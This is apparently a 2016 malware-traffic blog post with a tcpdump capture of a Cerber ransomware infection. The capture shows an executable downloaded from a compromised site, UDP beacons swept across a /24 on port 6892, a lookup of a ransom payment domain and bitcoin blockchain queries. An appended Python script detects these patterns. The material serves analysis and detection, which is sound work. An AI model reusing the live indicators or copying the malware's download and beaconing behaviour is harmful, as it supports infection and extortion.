Monthly Archives: December 2016

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

 

Example of files that were encrypted and protected:

 

The domain name ftoxmpdipwobp4qy.joa688.top returned NXDOMAIN (no A record; see the DNS query at 01:32:13 below) and was not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
E..)w.@……..f.:……sjm….IP………….
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
E..(..@……..fH……P.n.2….P….?……..
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
E..&$…..C….f.1……….hi00889070……..
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
E..&.D….KC…f.1……….hi00889070……..
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
E..&xz………f.1……….hi00889070……..
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
E..&A…..&….f.1……….hi00889070……..
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
E..&
…..]….f.1……….hi00889070……..
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
E..&3<….5G…f.1……….hi00889070……..
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
E..&V……p…f.1……….hi00889070……..
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10

2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
E..4p……m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
E..4s……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
E..4J……….f.1.     ….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
E..4/l….9….f.1.
….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
E..4……Q….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24
E..4^…..
c…f.1……. 2.2107cd482fd40088950110cf

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)
E..I………..fKKKK…5.5~R.+………..ftoxmpdipwobp4qy.joa688.top…..

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
E..;………..fKKKK.(.5.’…m………..btc.blockr.io…..
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4c.@…9-…f…….P………. .w……………
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
E..(c.@…98…f…….P….$.-IP………….
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
E..&c.@…89…f…….P….$.-IP…>…GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429
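As an added illustration that is not part of the original post, the following Python script parses tcpdump summary lines like the ones above and flags the beaconing pattern visible in this capture: one source port spraying identical short UDP datagrams at consecutive hosts of a single /24 on the same destination port within a fraction of a second. It also pulls out HTTP GET requests for executables, such as the 4fv3b5.exe download at the top of the capture. The sample lines are copied from the capture above (payload dump lines omitted); the thresholds (five hosts, five-second window) and the function names are assumptions chosen for this example, not values taken from Cerber itself.

```python
import re
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed sample: tcpdump summary lines taken from the capture above.
# The ASCII payload dump lines are intentionally left out; only the
# one-line packet summaries are parsed.
SAMPLE = """\
2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
"""

# Matches a plain UDP summary line; DNS queries carry extra text after the
# colon and therefore do not match, which is what we want.
UDP_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): UDP, length (?P<len>\d+)$"
)

# Matches the request line tcpdump prints for an HTTP GET of an .exe file.
EXE_RE = re.compile(r"HTTP: GET (?P<uri>\S+\.exe) HTTP/1\.[01]")


def find_udp_sweeps(text, min_hosts=5, window_seconds=5.0):
    """Return one finding per (src, sport, dport, length) tuple whose datagrams
    reach at least `min_hosts` distinct addresses inside one /24 within
    `window_seconds`. Both thresholds are assumptions for this example."""
    groups = defaultdict(list)
    for line in text.splitlines():
        m = UDP_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        key = (m["src"], int(m["sport"]), int(m["dport"]), int(m["len"]))
        groups[key].append((ts, ip_address(m["dst"])))

    findings = []
    for (src, sport, dport, length), hits in groups.items():
        hits.sort()
        # Bucket destinations by their /24 so a sweep of one block stands out.
        by_net = defaultdict(list)
        for ts, dst in hits:
            by_net[ip_network(f"{dst}/24", strict=False)].append((ts, dst))
        for net, nhits in by_net.items():
            hosts = {dst for _, dst in nhits}
            span = (nhits[-1][0] - nhits[0][0]).total_seconds()
            if len(hosts) >= min_hosts and span <= window_seconds:
                findings.append({
                    "src": src, "sport": sport, "dport": dport,
                    "length": length, "network": str(net),
                    "hosts": len(hosts), "span_seconds": span,
                })
    return findings


def find_exe_downloads(text):
    """Return the URIs of HTTP GET requests for .exe files seen in the summary lines."""
    return [m["uri"] for m in (EXE_RE.search(l) for l in text.splitlines()) if m]


if __name__ == "__main__":
    for f in find_udp_sweeps(SAMPLE):
        print(f"UDP sweep: {f['src']}:{f['sport']} -> {f['network']} port {f['dport']}, "
              f"{f['hosts']} hosts, payload {f['length']} bytes, {f['span_seconds']:.6f}s")
    for uri in find_exe_downloads(SAMPLE):
        print(f"EXE download request: {uri}")
```

With the defaults, only the port 59297 burst is reported (eight hosts in 15.49.2.0/24 within about a millisecond); lowering `min_hosts` to 2 also surfaces the shorter port 59298 burst. Running this over full tcpdump summary output rather than this excerpt is the intended use; the payload dump lines are ignored by the regexes.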
